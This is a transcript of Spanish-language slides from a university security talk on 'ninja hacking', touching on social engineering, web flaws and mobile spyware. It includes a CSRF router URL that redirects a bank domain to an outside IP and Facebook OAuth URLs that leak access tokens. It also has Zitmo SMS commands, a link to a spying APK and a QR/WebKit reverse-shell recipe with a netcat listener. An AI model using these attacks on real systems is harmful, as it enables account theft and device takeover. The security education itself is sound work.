Ninja hacking

Post on 26-May-2015

316 views 0 download

Tags:

description

Conferencia Impartida en la Universidad Autónoma de Aguascalientes. Los ejemplos mostrados, fueron parchados en su tiempo. Platica informal. {mix/page=Jugando al Espía)

Transcript of Ninja hacking

Ninja~HackingNinja~HackingVII Congreso de Ciencias ExactasVII Congreso de Ciencias Exactas

Rafael Bucio.Rafael Bucio.Rafael@Bucio.com.mx@Bucio

Esta platica es...Con fines educativos.

✔ Cultura ✔ Samurai & Ninja Ninjutsu 忍術✔ Estrategia / formas de engaño (Bo Ryaku)

✔ Suplantación e Infiltración (Inton Jutsu)

✔ Ocultación y Camuflaje (Shinobi Iri)

✔ Espionaje (Cho Ho)

✔ Stuff

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

✔ Cultura

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

HACKER:

En el mundo de la informática, un hacker es una persona que entra de forma no autorizada a computadoras y redes de computadoras. Su motivación varía de acuerdo a su ideología: fines de lucro, como una forma de protesta o simplemente por la satisfacción de lograrlo.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

WHITE HAT BLACK HAT

CrackerPhreakerCarder

Lammer Script-kiddieNewbie (n00b)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

✔ Samurai & Ninja

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Samurai & Ninja.~$ Samurai & Ninja.

✔ Estrategia / formas de engaño(Bo Ryaku)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

Fin común:

✔Obtener Información / Obstruir información

Escenarios:

✔Internet✔Redes Locales

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Escenario: Internet

Tácticas:

✔Injection *SQL✔Auth, Session Management✔XSS✔Sensitive Data Exposure✔Using Components with Known Vulnerabilities

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Escenario: Locales

Tácticas:

✔ Sniffing✔ DNS Poisoning/modem✔ MITM ~ (man-in-the-middle)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

¿Ingeniería Social?

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

QR con Premio

Es el uso de influencia y persuasión sobre una(s) persona(s) para engañarla(s) y obtener información

confidencial o sensible para fines maliciosos!

Ingeniería social básica. #win

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Ingeniería social a jaquers. #EPICwin

✔ Suplantación e Infiltración (Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Escenarios:

➔Internet

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Escenarios:

➔Internet

Paginas Web.Redes Sociales.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Fin común / TARGET* | Obtener Acceso completo al servidor

Ejemplo: Secretaria de Gobierno Quintana Roo 2005/2011

/*Tiempo 20 min*/

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://segob.qroo.gob.mx/

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Kernel -> exploit -> root Backdoor ( /tmp -> Escuchar obtener Root)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Injection SQL

Es una vulnerabilidad de las Web, que afectan directamente a las bases de datos de una aplicación, El problema radica al filtrar erróneamente las variables utilizadas en parte de la

página con código SQL.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

✔ Ocultación y Camuflaje (Shinobi Iri)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

✔ Sniffing.

✔ Phishing.

✔ Pharming.

✔ Robo de identidad.

✗Jugar al espia.. con tú novi@.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Cross Site Request ForgeryModifica la configuración del dispositivo usando una petición GET

http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

El caso de el jefe de seguridad en Facebok:

“Los empleados que lograron hackear al ingeniero de SRE (Site Reliability Engineering) se ubicaron sigilosamente cerca de su domicilio particular, y conectaron un router inalámbrico que se identificó con el mismo SSID de la red casera de la víctima.”

✔ Espionaje(Cho Ho)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

OBTNER INFORMACIÓN.

Facebook OAuth

(the bug is closed now.)12.marzo.2013

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

redirect_ur i= http://www.touch.facebook.com/#/x/#/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://touch.facebook.com/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f/#access_token=ACCESS TOKEN

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Facebook OAuth bug (xd_arbiter.php)

12.ABRIL.2013this bug was closed by Facebook Security Team

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://static.ak.facebook.com/connect/xd_arbiter.php?version=21#channel=f876ddf24&origin=http://localhost&chan

nel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&” 

 → https://developers.facebook.com/docs/reference/javascript/   

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/&#8221   

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://facebook.com/connect/xd_arbiter.php?#!/l.php?u=http://facebook.com/l.php?

u=http://localhost/oauth/boom.php?&h=WAQGoSQT6&origin=http://facebook.com/

VER VIDEOpwn_fb_2.ogv.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

http://touch.facebook.com/connect/xd_arbiter.php?

#!/apps/APPmalvada/?&origin=http:// facebook.com/

Da e l t o ke n y p e rm i s os d e c ua l q u i e r c u enta en fac ebo o k q u e d e c l i c k .

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

$12,500 USD

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

$20,000 USD

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

1)Cambiar Value por el profile_id de la victima. 2)Enviar F al 32665 y recibes un codigo de 8 caracters.3)Ingresas el codigo pwn pwn

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Android como herramienta para espiar.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Proyecto off.http://works.bucio.com.mx/apk/ds.apk

VIDEOds.ogg

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Botnets zitmozitmo

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Controlar el dispositivo a través de mensajes de texto permite a los cibercriminales vulnerar los sistemas de doble autenticación de una manera sencilla. Manteniéndose ocultos en dentro de los sistemas del usuario, ya sea en los equipos de escritorio o los dispositivos móviles logran realizar las transferencias bancarias de una manera sigilosa y sin alertar al usuario.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

#: Es el comando inicial que le permite al atacante conocer si el dispositivo está infectado o no.

/: Permite definir a qué número de teléfono se van a enviar los mensajes que reciba el dispositivo de la víctima.

!: Desactiva y deshabilita la ejecución de ZITMO en el teléfono con Android.

,: Finaliza la secuencia de comandos y vuelve a activar la recepción de mensajes en el dispositivo móvil de la víctima.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Ejemplo.

HELLCELHELLCEL

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Sniffing

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Sniffing

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

"Dios mío, Apple me ha expulsado del desarrollo del programa de iOS,

¡qué grosero!" Charlie Miller

El desarrollador había creado una aplicación de seguimiento de valores bursátiles llamado IntaStock.

Esta app incluía en sus códigos un malware que permitía al hacker (en este caso, el

mismo Charlie Miller) descargar información de los terminales, tales como fotografías, datos y contactos.

V i d eo i p h o ne . o g v

The Jester Style.

RECETA:

*QR-CODE *URL [host]

*JS-ENCODER*netcat http://scriptasylum.com/tutorials/encode-decode.html

QR-Codes <- android o IOS 99%

UTF JS codificado dentro del HTML

PAGINA.HTML shellcode executed→

Remote Code Execution CVE-2010-1807,

QR-Codes android o IOS 99%←→

UTF JS codificado dentro del HTML

PAGINA.HTML → shellcode executed

WebKit[dispositivo] → Reverse TCP shell connection to a ‘remote server’ port 37337

nc -v -l -p 37337 ....

ZoAuthoAuth

$> stuff.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

Certified Cyber Security Ninja (CCSN)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

6r4c145

IM: IM: rafael@bucio.com.mxrafael@bucio.com.mx

Twitter: @BucioTwitter: @Bucio